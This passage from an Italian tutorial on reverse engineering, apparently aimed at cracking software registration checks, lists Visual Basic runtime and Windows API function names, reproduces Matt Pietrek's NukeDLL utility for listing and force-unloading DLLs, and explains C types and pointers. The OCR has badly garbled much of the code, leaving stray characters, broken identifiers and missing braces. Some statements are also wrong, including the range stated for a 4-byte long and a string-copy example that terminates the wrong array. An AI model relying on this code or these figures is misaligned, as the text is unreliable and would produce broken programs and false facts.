304 EVENT_SINK_Invoke 
305 _ _vbaStrCat 

306 __vbaStrCmp 

307 _ vbaStrComp 

308 _ _vbaStrCompVar 
309 __vbaStrCy 


310 
BASIC_CLASS_QueryInterface 
311 BASIC_CLASS_AddRef 
312 BASIC_CLASS_Release 

313 
BASIC_CLASS_GetIDsOfNames 

314 BASIC_CLASS_Invoke 

315 _ _vbaStrDate 

316 _ _vbaStrFixstr 

317 _ vbaStrI2 

318 __vbaStrI4 

319 _ _vbaStrLike 

320 
BASIC _DISPINTERFACE_GetTICou 
nt 

dzi 
BASIC_DISPINTERFACE_GetTypeI 
nfo 

322 __vbaStrR4 

323 _ _vbaStrR8 

324 __vbaStrTextCmp 

325 _ _vbaStrTextLike 

326 __vbaStrToAnsi 

327 _ vbaStrToUnicode 

328 _ _vbaStrUI1l 

329 __vbaStrVarCopy 

330 Zombie _QueryInterface 

331 Zombie_AddRef 

332 Zombie_Release 

333 
Zombie_GetTypeInfoCount 

334 Zombie _GetTypeInfo 

335 Zombie_GetIDsOfNames 

336 Zombie_Invoke 

337 _ _vbaStrVarMove 

338 __vbaStrVarVal 

339 _ _vbaUI1Cy 

340 EVENT_SINK2_AddRef 

341 EVENT_SINK2_Release 

342 __vbaUIlErrVvar 

343 __vbauIiStr 

344 __vbaUI1Var 

345 __vbaUbound 

346 __vbaUdtVar 

347 __vbaunkVvar 

348 __vbavar2Vec 

349 __vbaVarAbs 

350 __vbaVvarAdd 

351 __vbavarAnd 

352 __vbavarCat 

353 _ vbaVarCmpEq 

354 __vbaVarCmpGe 

355 _ vbaVarCmpGt 

356 __vbaVarCmpLe 

357 _ vbaVarCmpLt 

358 _ vbaVarCmpNe 

359 __vbavarDateVar 

360 __vbaVvarDiv 

361 __vbaVvarEgv 

362 __vbavareErriI4 

363 __vbaVarFix 

364 __vbavarForInit 

365 __vbaVvarForNext 

366 __vbaVvarIdiv 

367 _ vbaVarImp 

368 __vbavarIndexLoad 

369 __vbavarIndexLoadRef 

370 
__vbaVarIndexLoadRefLock 

371 __vbavarIndexStore 

372 _ _vbaVarIndexStore0bj 

373 _ _vbavarIint 

374 __vbavarLike 

375 __vbavarLikeVar 

376 __vbaVvarMod 

377 _ vbavarMul 

378 _ vbaVarNeg 

379 __vbavarNot 


380 
381 
382 
383 
384 
385 
386 
387 
388 
389 
390 
391 
392 
393 
394 
395 
396 
397 
398 
399 
400 
401 
402 
403 
404 
405 
406 
407 
408 
409 
410 
411 
412 
413 
414 
415 
416 
417 
418 
419 
420 
421 
422 
423 
424 
425 
426 
427 
428 
429 
430 
431 
432 
433 
434 
435 
436 
437 
438 
439 
440 
441 
442 
443 
444 
445 
446 
447 
448 
449 
450 
451 
452 
453 
454 
455 
456 
457 


__vbaVaror 
__vbaVarPow 

_ VbaVarSetObj 

_— vbaVarSetObjAddref 
__vbaVvarSetUnk 
__vbaVvarSetUnkAddref 
__vbaVvarSetVar 

_ _vbaVvarSetVarAddref 
__vbaVvarSub 

_ vbaVarTextCmpEq 
_ VvbaVarTextCmpGe 
_ VvbaVarTextCmpGt 
_ VvbaVarTextCmpLe 
_ vbaVarTextCmpLt 
_ vbaVarTextCmpNe 
__vbaVarTextLike 
_ _vbaVarTextLikeVar 
_ vbaVarTextTstEq 
__vbaVarTextTstGe 
_ _vbaVarTextTstGt 
_ _vbaVarTextTstLe 
_ _vbaVarTextTstLt 
__vbaVarTextTstNe 
_ vbaVarTsteEq 

_ _vbaVarTstGe 

_ _vbaVvarTstGt 

_ _vbaVvarTstLe 
__vbaVarTstLt 

_ vbaVarTstNe 
__vbaVarXor 

_— VvbaVargobj 

_— vbaVargObjAddref 
rtcLeftBstr 
rtcLeftVar 
rtcRightBstr 
rtcRightVar 
rtcAnsiValueBstr 
rtcLowerCaseBstr 
rtcLowerCaseVar 
rteTrimBstr 
rteTrimVar 
rtcLeftTrimBstr 
rtcLeftTrimVvar 
rtcRightTrimBstr 
rtcRightTrimVar 
rtcSpaceBstr 
rtcSpaceVar 
rtcUpperCaseBstr 
rtcUpperCaseVar 
rtcKillFiles 
rtcChangeDir 
rtceMakeDir 
rtcRemoveDir 
rtcChangeDrive 
rtcBeep 
rtcGetTimer 
rteStrFromVar 
rtcBstrFromAnsi 
rtcPackDate 
rtcPackTime 
rtcGetDateValue 
rtcGetTimeValue 
rtcGetDayOfMonth 
rtcGetHourOfDay 
rtcGetMinute0OfHour 
rtcGetMonthofYear 
rtcGetPresentDate 
rtcGetSecondofMinute 
rtcSetDateVar 
rtcSetDateBstr 
rtcSetTimeVar 
rtcSetTimeBstr 
rtcGetDayOfWeek 
rtcGetYear 
rtcFileReset 
rtcFileAttributes 
rtcIsArray 
rtcIsbate 


458 rtcIsEmpty 518 rtcRightCharBstr 
459 rtcIsError 519 rtcRightCharVar 
460 rtcIsNull 520 rtcInputCharCount 
461 rtcIsNumeric 521 rtcInputCharCountVar 
462 rtcIsobject 522 rteStrConvVar 
463 rtcVarType 523 _ vbawriteFile 
464 rtDecFromVvar 524 rtcGetHostLCID 
465 rtcFileWwidth 525 rtcCreate0bject 
466 rtcInputCount 526 rtcGetObject 

467 rtcInputCountVar 527 rtcAppleScript 
468 rtcFileSeek 528 rtcMidBstr 

469 rtcFileLocation 529 rtcMidVar 

470 rtcFileLength 530 rtcInStr 

471 rtcEndofFile 531 rtcMidCharBstr 
472 rtcHexBstrFromVvar 532 rtcMidCharVar 
473 rtcHexVarFromVar 533 rtcInStrChar 

474 rtcOctBstrFromVar 534 rtBstrFromerrVvar 
475 rtcOctVarFromVvar 535 rtBoolFromerrVvar 
476 rtcFileCopy 536 rtCyFromerrVar 
477 rtcFileDateTime 537 rtI2FromerrVar 
478 rtcFileLen 538 rtI4FromerrVar 
479 rtcGetFileAttr 539 rtR4FromerrVar 
480 rtcSetFileAttr 540 rtR8FromerrVar 
481 rtcR8ValFromBstr 541 rtcDateFromVar 
482 rteSin 542 rtceVarFromVar 
483 rtcCos 543 rtceCVvErrFromvar 
484 rtceTan 544 VarPtr 

485 rtcAtn 545 rtceDir 

486 rtcExp 546 rtcCurrentDirBstr 
487 rtcLog 547 rtcCurrentDir 
488 rtcRgb 548 rtcFreeFile 

489 rtcQBColor 549 rtcCompareBstr 
490 rtcMacid 550 rtcBstrFromFormatVar 
491 rtcTypeName 551 rtcBstrFromerror 
492 rtcIsMissing 552 rtceVarFromerror 
493 rtcRandomNext 553 rtcLenCharVar 
494 rtcRandomize 554 rtcLenVar 

495 rtcMsgBox 555 rtcFixVar 

496 rtcInputBox 556 rtcAbsVar 

497 rtcAppActivate 557 rtcIntVar 

498 rtcDoEvents 558 rteSgnvar 

499 rtcSendKeys 559 _adj_fdiv_m16i 
500 rtcShell 560 rtcVarFromFormatVar 
501 rtcArray 561 rtcDbateAdd 

502 _ _vbaVargunk 562 rtcbateDiff 

503 __vbaVargUnkAddref 563 rtcDatePart 

504 _ _vbaverifyVarObj 564 rtcPartition 

505 rtcGeteErl 565 rtcChoose 

506 rtceStringBstr 566 rtcEnvironVar 
507 rteStringVar 567 rtcEnvironBstr 
508 rtcVarBstrFromAnsi 568 rtcSwitch 

509 rtcGetDateBstr 569 rtcCommandBstr 
510 rtcGetDateVar 570 rtcCommandVar 
511 rtcGetTimeBstr 571 rteSLN 

512 rtcGetTimeVar 572 rtesYyD 

513 rtceVarStrFromVvar 573 rtceDDB 

514 rteSqr 574 rtcIPMT 

515 rtcIMEStatus 575 rtcPPMT 

516 rtcLeftCharBstr 576 rtcPMT 

517 rtcLeftCharVar 577 rtcPv 


Comunque della serie tutto finisce in chiamate API 
ecco l'albero gerarchico delle DLL. 

A livello di kernel32.dll, gdi32.dll ecc. si 
troveranno le varie funzioni che sono viste nel 
capitolo relativo alle API Windows. 

Queste che seguono sono sono le funzioni importate. 

A fianco ci trovate le DLL a cui si riferiscono. 

In ogni caso andando a cercare le funzioni relative 
alle routines di serializzazione dovremo cercare le 
funzioni elencate precedentemente. 


578 
579 
580 
581 
582 
583 
584 
585 
586 
587 
588 
589 
590 
591 
592 
593 
594 
595 
596 
597 
598 
599 


rteFv 

rtceNPer 

rtcRate 
rtcImmediateIf 
rtcIRR 

rtcMIRR 

rteNPV 

rtcErrobj 
rtUI1FromeErrVar 
rtcVarDateFromVar 
_adj_fdiv_m32 
rtcGetSetting 
rtcSaveSetting 
rtcDeleteSetting 
rtcGetAllSettings 
rtcByteValueBstr 
rtcBstrFromByte 
rtcVarBstrFromByte 
rtcCharValueBstr 
rteBstrFromChar 
rteVarBstrFromChar 
rtcSetCurrentCalendar 


600 rtcGetCurrentCalendar 
601 _adj_fdiv_m32i 
602 rtcFormatNumber 


603 
604 
605 
606 
607 
608 
609 
610 
611 
612 
613 
614 
615 
616 
617 
618 
619 
620 
621 
622 
623 
624 
625 
626 
627 
628 
899 
916 
924 
925 


rtcFormatCurrency 
rtcFormatPercent 
rtcFormatDateTime 
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SetMenuDefaultItem 
SetMenuItemInfoA 
SetParent 
SetPropA 
SetRect 
SetScrollInfo 
SetScrollPos 
SetScrollRange 
SetTimer 
SetWindowContextHelpId 
SetWindowLongA 
SetWindowPos 
SetWindowRgn 
SetWindowTextA 
SetWindowsHookExA 
SetWindowsHookExW 
ShowCaret 
ShowCursor 
ShowScrollBar 
Showwindow 
SubtractRect 
SystemParametersInfoA 
TabbedTextOutA 
ToAscii 
TrackPopupMenu 
TranslateMDISysAccel 
TranslateMessage 
UnhookWwindowsHookEx 
UnregisterClassA 
UpdateWindow 
VkKeyScanA 
VkKeyScanW 
WaitForInputIdle 
WaitMessage 
WinHelpA 
WindowFromPoint 
keybd_event 
612wsprintfA 


DLL CARICATE NEL SISTEMA 


Fino ad ora abbiamo analizzato utilities che permettevano di vedere quali DLL 
sono caricate nel sistema. 

La cosa interessante è quella legata alla metodologia per ricavare queste 
informazioni da nostri programmi. 

Il seguente programma in C vi mostra le DLL caricate nel sistema. 


Nukedll.c 


#include <windows. h> 
#include <toolhelp.h> 
#include "nukedll.h" 


// A private message posted by the NotifyRegister callback routine when 
// module load/unload activity starts. 
#define WM_UPDATE_DLL_LIST (WM_USER+0x200) 


BOOL DllListNeedsRefresh = FALSE; // Set to TRUE when module activity starts 
HWND HwndDlg; // The HWND of the main dialog 


// Make a variable in a far data segment, thereby preventing a 2nd 
// instance of the program from starting up. We have a relocation 
// to the DGROUP in the NotifyRegisterCallback() routine. If we 
// wanted to be fancy, we could look up the HWND of the previous 
// instance and activate it. 

int far ForceMultipleDataSegs; 


// Returns non-zero if the passed parameter is an HMODULE, 0 otherwise 
BOOL IsHModule(HMODULE hModule) 


{ 
MODULEENTRY me; 
// Use TOOLHELP to tell us if the passed HMODULE is valid. If we 
// were worried about speed, we could treat the HMODULE as a selector 
// and read the first two bytes of the segment. If they're 'NE', then 
// it's an HMODULE. 
me.dwSize = sizeof(me); 
return ModuleFindHandle(&me, hModule); 
} 


// Given a dialog box handle and and a listbox ID, return the item data 
// value of the currently selected listbox entry. 
DWORD GetSelectedItemData(HWND hwndblg, int listboxID) 


{ 
int index; 
index = (int)SendblgItemMessage(hWndDblg, listboxID, LB_GETCURSEL, 0, 0); 
if ( index == - ) 
return OxFFFFFFFF; 
return SendDlgItemMessage(hwndDlg, listboxID, 
LB_GETITEMDATA, index, 0); 
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// Update the left listbox to reflect the current list of loaded DLLs 
void UpdateDllList(HWND hwndDlg) 


MODULEENTRY me; 


BOOL moreToGo; 

char szBuffer[256]; 
HWND hwndListbox; 
LPWORD lpModuleFlags; 


// Get the listbox's HWND. We'll be sending numerous messages to it, 
// so it's more efficient than using SendDlgItemMessage(). 
hwndListbox = GetblgItem(hwndDlg, IDL_ DLLS); 


// Clear the listbox's contents 
SendMessage(hwndListbox, LB_RESETCONTENT, 0, 0); 


// Use TOOLHELP to enumerate through all the DLLs in the system 
me.dwSize = sizeof(me); 

moreToGo = ModuleFirst(&me); 

while ( moreToGo ) 


{ 
// Get a pointer to the flags WORD in the module database 
lpModuleFlags = MAKELP(me.hModule, OxC); 
// Is it a DLL module? 
if ( *IpModuleFlags & 0x8000 ) 
// Format a string with the module's name and reference count 
wsprintf(szBuffer, "%s (%u)", (LPSTR)me.szModule, me.wcUsage); 
// Add the string to the beginning of the listbox, and then 
// store the HMODULE in the new entry's item data. 
SendMessage(hwndListbox, LB_INSERTSTRING, 0, 
(LPARAM)(LPSTR)szBuffer); 
SendMessage(hwndListbox, LB_SETITEMDATA, 0, me.hModule); 
} 
moreToGo = ModuleNext(&me); // Go on to next module 
} 


// After listing all the modules, set the selection to the first one 
SendMessage(hwndListbox, LB_SETCURSEL, 0, 0); 


} 


// update the righthand listbox to show all the modules that reference 
// the selected module in the left listbox. 
void UpdateReferencingDllList(HWND hwndDlg, HMODULE hModule) 
{ 
MODULEENTRY me; 
BOOL moreToGo; 
char szBuffer[256]; 
HWND hwndListbox; 
BOOL fHasReferencingDll = FALSE; 


// Get the listbox's HWND. We'll be sending numerous messages to it, 
// so it's more efficient than using SendDlgItemMessage(). 
hwndListbox = GetblgItem(hwndDlg, IDL_USED BY); 


// Clear the listbox's contents 
SendMessage(hwndListbox, LB_RESETCONTENT, 0, 0); 


// If we were somehow passed an invalid HMODULE, bail out now 
if ( IsHModule(hModule) == FALSE ) 
return; 


// Use TOOLHELP to enumerate through all the DLLs in the system 


me.dwSize = sizeof(me); 
moreToGo = ModuleFirst(&me); 
while ( moreToGo ) 
{ 
// Make a pointer to the size of the module reference table 
// of the current module in the enumeration 
LPWORD lpModRefCount = MAKELP(me.hModule, Ox1E); 
HMODULE far * lpModRefTable; 
WORD i, npModRefTable; 


// Make a far pointer to the module reference table of the 
// current module in the enumeration 

npModRefTable = *(LPWORD)MAKELP(me.hModule, 0x28); 
lpModRefTable = MAKELP(me.hModule, npModRefTable); 


// Iterate through all the entries in the module reference table 
for ( i = 0; i < *1pModRefCount; it+ ) 
{ 
// Did we find an HMODULE that matches the one selected in 
// the left listbox? 
if ( *1pModRefTable == hModule ) 


// At least one module references the selected DLL 
fHasReferencingDll = TRUE; 


// Add the module name to the right listbox 
SendMessage(hWwndListbox, LB_ADDSTRING, 0, 
(LPARAM) (LPSTR)me.szModule); 


break; // No need to keep looking! 
} 


// Advance to next HMODULE in the module reference table 
lpModRefTable++; 


} 


// Go on to the next module in the system 
moreToGo = ModuleNext(&me); 


} 


// If no module directly references the selected module, the module 

// must have been loaded via LoadLibrary. 

if ( fHasReferencingDl1l == FALSE ) 

{ 
wsprintf(szBuffer, "%d LoadLibrary loads", GetModuleUsage(hModule)); 
SendMessage(hWndListbox, LB_ADDSTRING, 0, (LPARAM)(LPSTR)szBuffer); 


} 


// This routine is similar to the UpdateReferencingbllList above. Instead 

// of filling in a listbox though, it simply returns true if at least one 

// module is currently implicitly linked to the passed HMODULE. 

BOOL HasReferencingD11(HMODULE hModule) 

{ 
MODULEENTRY me; 
BOOL moreToGo; 


if ( IsHModule(hModule) == FALSE ) 
return FALSE; 


me.dwSize = sizeof(me); 
moreToGo = ModuleFirst(&me); 


while ( moreToGo ) 


{ 
LPWORD lpModRefCount = MAKELP(me.hModule, Ox1E); 


HMODULE far * lpModRefTable; 
WORD i, npModRefTable; 


*(LPWORD)MAKELP(me.hModule, 0x28); 


npModRefTable 
MAKELP(me.hModule, npModRefTable); 


lpModRefTable 


for ( i = 0; i < *1pModRefCount; it+ ) 


if ( *1pModRefTable == hModule ) 
return TRUE; // Bail out! At least one referencer 


found. 


lpModRefTable++; // Advance to next HMODULE 
moreToGo = ModuleNext(&me); 


return FALSE; 
} 


// The TOOLHELP notification handler routine. Looks for for module loads 
// and unloads, and tells the main window when to update the DLL list. 
BOOL CALLBACK _ _loadds NotifyRegisterCallback(WORD wID, DWORD dwbata) 
{ 
// BC++ 3.1 has a bug where it ignores __loadds. Therefore 
// we have to load DS by hand. 
#ifdef __BORLANDC__ 
_ asm { 
MOV ax, seg HWndDlg 
Mov ds, ax 


} 
#endif 
if ( (wID == NFY_DELMODULE) || (wID == NFY_STARTDLL) ) 


// Only do this for the first DLL in the group of loads/unloads 
if ( DllListNeedsRefresh == FALSE ) 


{ 
DllListNeedsRefresh = TRUE; 
// Tell dialog to redraw the DLL list and then select 
// the first DLL in the list 
PostMessage(HWwndDlg, WM_UPDATE_DLL_LIST, 0, 0); 
PostMessage(HwndDlg, WM_COMMAND, IDL_DLLS, 
MAKELPARAM(0, LBN_SELCHANGE)); 
} 
} 
return FALSE; // Tell TOOLHELP that we didn't handle the notification 


} 


// HWandles all WM_COMMAND messages for the dialog 
void Handle_wWM_COMMAND(HWND hWndDlg, WPARAM wParam, LPARAM lParam) 


if ( wParam == IDL_ DLLS ) // Left listbox 


if ( HIWORD(lParam) == LBN_SELCHANGE ) // User has selected 
something 


HMODULE hModule; 


you 


} 


hModule = (HMODULE)GetSelectedItembata(hwndDblg, IDL DLLS); 
UpdateReferencingDllList(hWwndblg, hModule); 


} 


} 
else if ( wParam == IDB_NUKE_DLLS )// "Nuke Highlighted DLL" button 
{ 

HMODULE hModule; 

int cUsage; 


// Get the HMODULE of the selected DLL out of the item data 
hModule = (HMODULE)GetSelectedItemData(hwWndblg, IDL_DLLS); 
if ( IsHModule(hModule) == FALSE ) 

return; 


// Check to see if anybody is directly using the DLL. If so, 
// prompt the user to make sure they want to procede 
if ( HasReferencingDll(hModule) == TRUE ) 


{ 
if ( MessageBox(hwWwndDlg, 
"The selected DLL has modules that reference it. Are 
"sure you want to do this?", "Hold on...", 
MB_YESNO | MB_ICONHAND) != IDYES ) 
return; 
} 


// Get the reference count of the DLL and call 
// FreeLibrary that many times 
cUsage = GetModuleUsage(hModule); 
while ( cUsage ) 
{ 
FreeLibrary( hModule ); 
cUsage--; 


} 


// We don't need to bother to update the DLL list here. The 
// ‘last FreeLibrary call above should have caused an 

// NFY_DELMODULE notification for the DLL. There should be a 
// WM_UPDATE_DLL_ LIST message in our message queue, just 

// waiting for the chance to redraw the DLL list. 


} 
else if ( wParam == IDB_EXIT ) // The "Exit" button 


EndDialog(HwndDlg, 0); 


// HWandles the initial setup of the dialog 
void Handle_wM_INITDIALOG(HWND hWndDlg, WPARAM wParam, LPARAM lParam) 


{ 


HWndblg = hwndDlg; 


// Draw the DLL list in the left listbox 
UpdateDllList(hWndDlg); 


// Fake a user selection of the first DLL in the list 
PostMessage(hwndDlg, WM_COMMAND, IDL_DLLS, MAKELPARAM(0, LBN_SELCHANGE)); 


// Set up our TOOLHELP notification callback 
NotifyRegister(0, (LPFNNOTIFYCALLBACK) NotifyRegisterCallback, NF_NORMAL); 


// Dialog procedure for the NukeDll dialog 
BOOL CALLBACK _export NukeDl1DlgProc(HWND hwndblg, UINT msg, 
WPARAM wParam, LPARAM lParam) 


switch ( msg ) 
{ 
case WM_COMMAND: 
Handle _WM_COMMAND(hwndDlg, wParam, lParam); 
return TRUE; 
case WM_INITDIALOG: 
Handle _WM_INITDIALOG(hWndDlg, wParam, lParam); 
return TRUE; 
case WM_UPDATE_DLL_LIST: 
UpdateDllList(hWndDlg); 
DllListNeedsRefresh = FALSE; 
break; 
case WM_CLOSE: 
EndDialog(hwndDlg, 0); 
return FALSE; 


} 
return FALSE; 
} 


int PASCAL WinMain( HANDLE hInstance, HANDLE hPrevInstance, 
LPSTR lpszCmdLine, int nCmdShow ) 


// Bring up the NukeDl1 dialog 
DialogBox(hInstance, "NukeD1l1Dlg", 0, (DLGPROC)NukeD1llblgProc); 


// Shut down the TOOLHELP notifications set up in Handle WM_INITDIALOG( ) 
NotifyUnRegister(0); 
return 0; 


} 


Il file di definizione 


Nukedl1.def 


NAME 'NUKEDLL' 
DESCRIPTION 'Program to show DLL list and terminate rogue DLLs' 
EXETYPE WINDOWS 
CODE PRELOAD MOVEABLE DISCARDABLE 
DATA PRELOAD MOVEABLE MULTIPLE 
STACKSIZE 5120 
HEAPSIZE 1024 
EXPORTS 
NukeDb11DlgProc @1 


Il fle d’include 


Nukedll.h 
#define IDB_EXIT 104 
#define IDB_NUKE_DLLS 103 
#define IDL_DLLS 101 
#define IDL_USED BY 102 
nukedll.rc 


#include <windows.h> 
#include "nukedll.h" 


NukeD11Dlg DIALOG 82, 48, 160, 114 
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX 
CAPTION "NukeDLL - Matt Pietrek 1994" 
BEGIN 

CONTROL "", IDL_DLLS, "LISTBOX", LBS_NOTIFY | WS_CHILD | WS_VISIBLE | 
WS_BORDER | WS_VSCROLL | WS_TABSTOP, 4, 14, 72, 80 

CONTROL "", IDL_USED_BY, "LISTBOX", WS_CHILD | WS_VISIBLE | WS_BORDER | 
WS_VSCROLL | WS_TABSTOP, 84, 14, 72, 80 

PUSHBUTTON "Nuke Highlighted DLL", IDB_NUKE_DLLS, 4, 98, 84, 14, WS_CHILD 
| WS_VISIBLE | WS_TABSTOP 

PUSHBUTTON "Exit", IDB_EXIT, 108, 98, 24, 14, WS_CHILD | WS_VISIBLE | 
WS_TABSTOP 

LTEXT "DLLs:", -1, 4, 4, 33, 8, WS_CHILD | WS_VISIBLE | WS_GROUP 

LTEXT "Used By:", -1, 84, 4, 33, 8, WS_CHILD | WS_VISIBLE | WS_GROUP 
END 


Ed infine il .mak 


Nukedll.mak 
PROJNAME = NUKEDLL 


$(PROJNAME).exe: $(PROJNAME).obj $(PROJNAME).res 
link /ON:N /A:16 $(PROJNAME).0bj, $(PROJNAME), , \ 
LIBW.LIB TOOLHELP.LIB SLIBCEW.LIB,$(PROJNAME) . def 
RC $(PROJNAME).res $(PROJNAME).exe 


$(PROJNAME) .0bj: $(PROJNAME).c $(PROJNAME) .h 
CL /W3 /GAS /62 /01 /c /Zi $(PROJNAME).c 


$(PROJNAME).res: $(PROJNAME).rc 
RC -R -FO $(PROJNAME).res $(PROJNAME).rc 


DATI E PUNTATORI IN C 


Porto da esempio i dati e i puntatori in C visto che questo è una via di mezzo 
tra assembler ed altri linguaggi. 

Inoltre il discorso è fatto in relazione alla quantità di software presenti 
scritti con questo linguaggio. 

Generalmente i software professionali sono scritti quasi tutti in C/C++ e se 
trovate qualche programma scritto in Vbasic sicuramente non fa parte di qualche 
grosso progetto. 

In Vbasic ci troverete il programmino che sostituisce la shell Windows per 
permettere la cancellazione e la copia di qualche files ma difficilmente ci 
troverete il pacchetto di grafica professionale. 

La teoria dei dati in C/C++ è semplice in quanto l’unico concetto che bisogna 
tenere a mente è la dimensione del valore da memorizzarci dentro. 

Mentre Vbasic differenzia il tipo stringa da quello numerico il C/C++ non fa 
nessuna considerazione in merito. 

Se ci troviamo davanti al problema di dover memorizzare un carattere, ‘E’ ad 
esempio, possiamo usare il tipo CHAR, non perchè questo è legato ai tipi 
carattere, ma solo perchè la dimensione di un CHAR in C è sufficente a mentenere 
memorizzato un valore compreso tra 0 e 255 per cui ‘E’, che in ASCII avrà un 
valore comèpreso in questo range, è idoneo ad essere mantenuto in una variabile 
di tipo CHAR. 

Una differenzazione può essere fatta per quanto concerne il tipo signed e quello 
unsigned. 

Normalmente un certo tipo di variabile riserva un numero X di bytes. 

Questi bytes possono essere visti come sequenze di bits di cui n-1 bits 
riservati al valore mentre 1 bits, l’ultimo, per il segno. 

Questo significa che se ci troviamo dinanzi ad un tipo da un byte 7 bits saranno 
per il valore mentre l’ultimo per il segno. 

Da ciò è facile capire che oi valori signed memorizzabili in un tipo da 1 byte è 
un valore compreso tra +- 127 ovvero il valore numerico rappresentabile da 7 
bits. 

I tipi del C sono 


a) char - Character. 
Il valore è da -128 a +127 
Se si utilizza la specifica unsitgned prima della definizione del tipo si fa in 
modo che anche il bit per la rappresentazione del segno venga usato per il 
valore per cui in un 
unsigned char 
Il seguente programmino testa se il sistema supporta il tipo unsigned. 
#include <stdio.h> 
main() 
char a; 


unsigned char b; 
a = b = 128; 


a >>= 1; 
b>>= 1; 
printf ( "\nYour computer has %ssigned char.\n\n", a == b ? "un" : "" ); 


b) int - Integers. 


Lo stesso discorso di prima. 

Il numero di bytes varia a aseconda della macchina. 

Una volta il tipo int era di 2 bytes su certe macchine mentre su altre che 
distinguevano il tipo long integer da quello short integer lo trattavano a 4 
bytes come il tipo long. 

In ogni caso guardate l’ambiente e il sistema. 

Se il tipo int è a 2 bytes allora avrete 


int - 2 bytes - 15 bits per il valore e 1 per il segno - da -32768 a +32767 
unsigned int - 2 bytes - 16 bits per il valore - 65535 


c) long - Long 
Qui il valore è quello di 4 bytes ovvrero 31 per il valore e 1 per il segno o 
tutti per il valore. 


Il range è -4294967296 +4294967295. 


d) float e double - The Real Numbers. 


I valori per questi tipi sono 


MAXFLOAT 3.40282346638528860e+38 
MINFLOAT 1.40129846432481707e-45 
MAXDOUBLE 1.79769313486231470e+308 
MINDOUBLE 4.94065645841246544e - 324 


In C avete a disposizione il concetto di array per creare delle liste di valori 
dello stesso tipo. 

Le stringhe vengono infatti trattate dal C come array anche se di fatto il 
compito di gestire alcune cose è compito degli algoritmi. 

Per fare un esempio con il basic potrei avere 


A$ 
B$ 


= “Stringa”; 

= A$; 

La prima variabile, a seguito dell’assegnazione, conterrebbe il valore Stringa. 
La seconda assegnazione copierebbe Stringa in B$. 

Di fatto quella che pe noi è una sola azione per il sistema è un algoritmo. 

In pratica ogni carattere di A$ verrebbe preso e se considerato valido copiato 
in B$. 

Il controllo di validità, è da copiare o no, potrebbe essere fatto mediante la 
lunghezza della stringa (ripeti per n volte con n = a len(A$)), oppure mediante 
un carattere di controllo (è il carattere x di A$ == al carattere di fine 
stringa ? NO. Allora copia). 

Questo per dire che in C le stringhe vengono trattate solo per il fatto ce 
esistono algoritmi per la loro gestione. 

In genere il carattere 0 (non ASCII(0) ... proprio NULL) è usato per terminare 
la stringa. 

Esiste una famiglia di funzioni del C che servono a manipolare le stringhe. 
Lasciamo per ora perdere il C++ e il suo operator overloading ! 

Queste funzioni permettono la copia di due array, l’accodamento e la 
comparazione. 

In ogni caso essiste sempre una grossa componente algoritmica che è simile a 
quella che troverete analizzando i sorgenti in assembler nelle fasi di 
comparazione. 

Prendiamo l'algoritmo di copia da un array all’altro. 

Usa i come indice e assegnalo a 0 

Prendi il caratteri i dell’array b. 

Segna posizione. 

E’ © ovvero il carattere di fine stringa ? 

Si. Aggiungi all’array a nella posizione i il carattere null e termina. 


No. Aggiungi all’array a nella posizione i il carattere i dell’array b. 
Incrementa i di 1 e riprendi dalla posizione segnata. 


Inc 


char a[] = “Stringa”; 
char b[10]; 
int index = 0; 


while(a[index] != 0) { 
b[index] = a[index]; 
++index; 


a[index] = 0; 


Bisogna ricordarsi sempre che in fase di assegnazione fatta alla dichiarazione 
il carattere 0 di fine stringa viene assegnato automaticamente se no è compito 
nostro ad inserirlo. 

Se ad esempio nell’algoritmo precedente ci si fosse dimenticati di assegnare 
l’aultimo 0 a a[index] avremmo avuto problemi utilizzando nuovamente a (provate 
a pensare se in b[] non ci fosse stato lo 0 ... sarebbe andato avanti 
al'infinito). 

Questo tipo di algoritmi li troverete spesso nei controlli fatti dalle routine 
in assembler. 

La comparazione di stringhe infatti avviene facendo questo ragionamento. 


Pendi il carattere i di a e confrontalo con il carattere i di b. 

Se è finita la stringa b ritorna 0. 

Se è uguale incrementa l’indice e ricomincia. 

Se non è uguale ritorna il valore del carattere i di a - (meno) il carattere i 
di Db. 


Il valore restituito sarà 


0 se a == bh 
<0 se a < b 
>0 se a > b 


A questo punto possiamo aggiungere un semplicissimo concetto. 

Dicevamo che il tipo dice che dimensione possiede al massimo il valore 
memorizzato. 

Le variabili dove sono memorizzate ? 

In memoria. 

Se quindi diciamo char a diciamo che a è una variabile di 1 byte in memoria. 
Ma se è in memoria e la memoria è una sequenza di bytes numerati da 0 alla 
dimensione massima del sistema potremo anche dire che a è posizionato ad un 
certo indirizzo. 

L'operatore unario & restituisce l'indirizzo di una variabile. 

Attenzione che gli array sono già trattati come array. 

Se abbiamo 


char a[20]; 

potremmo riferirci all’indirizzo del primo elemento di a con 
&a[0]; 

Essendo un array dire a senza null'altro è come dire &a[0]; 
A questo punto subentra l’aritmetica degli indirizzi. 


Ho omesso il concetto di struttura relativa ai dati in quanto preferisco vederla 
con gli indirizzi più avanti. 


L'operatore &, dicevamo restituisce l'indirizzo di un oggetto, mentre 
l’operatore * posizionato dinanzi ad un indirizzo ci fa riferire al contenuto di 
quell’indirizzo. 

Se avessimo 

int a = 20; 


Significa che a è una variabile intera (2 bytes) che contiene il valore 20. 
Questo valore 20 si troverà a qualche indirizzo di memoria per cui se dicessi 


&a 

sarebbe come dire l'indirizzo di a che in questo caso sarebbe l'indirizzo dove 
si trova il valore 20. 

Se &a è l'indirizzo di a: 

*(&a) 

sarebbe come dire il valore puntato dall’indirizzo di a per cui il comando 
stampa *(&a) 

stamperebbe 20. 

Gli indirizzi sono numeri per cui i puntatori possono essere soggetti ad un 
aritmetica. 

Avendo 

char a[20]; 

dire a sarebbe come dire &a[0] per cui a sarebbe un valore numerico. 

a+ 

è l'indirizzo rappresentato da a + 1 * dimensione_tipo. 

Fate attenzione a quel dimensione tipo. 

Gli incrementi, decrementi ecc. sono sempre relativi, in numero di bytes, al 
numero richiesto * la dimensione del tipo del puntatore. 

In bytes dire 

int a; 

int bytes = &a + 1; 

sarebbe come dire &a + (1 * dimensione di int) 

Per cui se &a è 1000 in bytes troveremo 1002 ovvero 1000 + (1 * 2). 

Usando gli array possiamo riferirci ad un elemento con 

a[100] 

ovvero il 100 elemento di a oppure 


&a[0] + (100 * 2) 


Avrete visto in alcuni esempi portati in altri capitoli la potenza 
dell’aritmetica dei puntatori. 


PREFAZIONE AI TIPI DI RICERCHE 


Come dicevamo prima, spesso la chiave per riuscire ad individuare i punti giusti 
in cui vengono eseguiti gli input dei codici di registrazione sta’ nel fatto di 
